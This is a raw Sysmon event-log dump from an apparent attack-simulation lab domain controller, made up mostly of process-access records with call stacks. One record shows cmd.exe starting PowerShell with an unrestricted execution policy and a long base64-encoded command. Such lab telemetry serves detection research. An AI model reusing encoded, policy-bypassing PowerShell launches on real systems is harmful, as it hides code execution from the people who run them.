13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004296Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004295Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004294Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004293Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004292Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-859F-5FCF-D500-000000009101}4104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004291Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004290Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004289Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-859F-5FCF-D400-000000009101}43604328C:\Windows\system32\cmd.exe{10ACEC4A-859F-5FCF-D500-000000009101}4104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004288Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.357{10ACEC4A-859F-5FCF-D500-000000009101}4104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-859F-5FCF-CB41-080000000000}0x841cb0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-859F-5FCF-D400-000000009101}4360C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000004287Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004286Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-859F-5FCF-D300-000000009101}50044516C:\Windows\system32\conhost.exe{10ACEC4A-859F-5FCF-D400-000000009101}4360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004285Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004284Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004283Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 